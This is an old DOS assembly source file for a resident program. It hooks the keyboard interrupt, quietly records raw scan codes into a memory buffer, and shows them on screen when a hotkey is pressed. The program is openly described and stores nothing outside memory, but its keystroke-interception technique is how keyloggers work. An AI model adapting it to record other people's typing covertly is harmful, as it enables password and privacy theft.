; This program will record keystrokes and re-display them when called upon
; Michael Krebs
; 10/24/94

model tiny

dataseg
codeseg
	org 100h

	LOOPBUFFER	equ	1		; 0 - Record first BUFSIZE
						;  chars after loading
						; 1 - After BUFSIZE chars
						;  read, reset buffer
	BUFSIZE		equ	100h		; Maximum size of buffer
	SHIFTKEYS	equ	0Ah		; Alt-Left Shift combination
	SCANCODE	equ	22h		; "g" key
	VIDEOSEG	equ	0B800h		; Segment of video buffer
	VIDEOATTR	equ	7		; Attribute of characters

start:
	jmp initialize				; Start the program

	buffer		db	BUFSIZE + 1 dup (0)
						; Buffer for keystrokes
	bufofs		dw	0		; Current offset in buffer

include kbdhouse.inc

showkeys proc near
	push cx dx di si ds es			; Save pertinent registers
	call kbdhousekeep			; Do housekeeping
	mov ah, 3				; Use function 3
	xor bh, bh				; Use page 0
	int 10h					; Get current cursor position
	mov al, dh				; Put row number in AL
	mov bl, 50h				; Calculate offset of row in
	mul bl					;  video buffer
	xor dh, dh				; Add the column number
	add ax, dx				;  |
	shl ax, 1				; Adjust bytes to words
	mov di, ax				; Set DI to video offset
	mov ax, VIDEOSEG			; Set ES to video segment
	mov es, ax				;  |
	push cs					; Set DS to current segment
	pop ds					;  |
	mov si, offset buffer			; Get offset of BUFFER

nextwrite:
	lodsb					; Get next character
	or al, al				; Check if string end
	jz endstr				; Jump if so
	mov bx, di				; Save current video offset
	add di, 6				; Get offset ahead 3 chars

nextdigit:
	xor ah, ah				; Set AH to 0
	mov cl, 0Ah				; Get next digit from right
	div cl					;  of number
	add ah, 30h				; Convert number to ASCII
	sub di, 2				; Adjust for next character
	mov es : [di], ah			; Put character on screen
	cmp bx, di				; Check if last digit
	jnz nextdigit				; Jump if not
	add di, 6				; Skip over written number
	mov byte ptr es : [di], 20h		; Put a space on the screen
	add di, 2				; Skip to next character
	jmp nextwrite				; Write next character

endstr:
	pop es ds si di dx cx			; Restore pertinent registers
	jmp endkbd
endp showkeys

newkbd proc far
	push ax bx				; Save pertinent registers
	in al, 60h				; Get keystroke
	cmp al, SCANCODE			; Check if hotkey pressed
	jnz regadd				; Jump if not
	xor bx, bx				; Set DS to 0
	mov ds, bx				;  |
	mov bl, ds : [417h]			; Get keyboard flags
	not bl					; Change all the bits
	test bl, SHIFTKEYS			; Check for "shift" keys
	jz showkeys				; Jump if pressed

regadd:
	cmp cs : bufofs, BUFSIZE		; Check if buffer full

if LOOPBUFFER eq 1
	jbe contadd				; Jump if not
	mov cs : bufofs, 0			; Reset buffer offset
else
	ja endkbd				; Jump if not
endif

contadd:
	mov bx, cs : bufofs			; Get offset in buffer
	mov cs : [buffer + bx], al		; Put keystroke in buffer
	inc cs : bufofs				; Increment buffer offset

endkbd:
	pop bx ax				; Restore pertinent registers

			db	0EAh		; Hard-coded FAR JMP to old
	oldkbd		dw	?		;  keyboard routine
			dw	?		;  |
endp newkbd

initialize:
	mov ax, 3509h				; Use function 25h, INT 9
	int 21h					; Get current INT 9 vector
	mov ds : [oldkbd], bx			; Save INT 9's vector in
	mov ds : [oldkbd + 2], es		;  variable
	mov ax, 2509h				; Use function 25h, INT 9
	mov dx, offset newkbd			; Get offset of new INT 9
	int 21h					; Set new INT 9 vector
	mov dx, offset initialize		; Get offset of TSR end
	int 27h					; Leave program in memory
end start